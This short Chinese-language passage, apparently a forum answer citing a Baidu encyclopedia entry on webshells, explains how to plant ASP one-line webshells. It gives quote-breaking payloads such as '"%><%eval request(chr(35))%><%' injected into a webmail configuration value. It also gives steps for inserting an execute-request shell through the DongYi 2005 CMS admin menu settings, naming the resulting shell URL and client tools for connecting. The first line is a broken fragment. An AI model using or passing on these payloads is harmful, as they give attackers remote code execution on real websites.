<form action=hacker@263.net":eval request(chr (35))//,?
在配制文件中就是webmail="cnhacker@263.net\":eval request(chr(35))//",
還有壹種方法就是寫上 cnhacker@263.net"%><%eval request(chr(35))%><%',這樣就會形成前後對應,最小馬也就運行了。<%eval request(chr(35))%>可以用lake2的eval發送端以及最新的2006 客戶端來連,需要說明的是數據庫插馬時候要選前者。
再如動易2005,到文章中心管理-頂部菜單設置-菜單其它特效,插入壹句話 馬"%><%execute request("l")%><%',保存頂部欄目菜單參數設置成功後,我們就得到馬地址http://網站/admin/rootclass_menu_config.asp.
參考資料:
百度百科webshell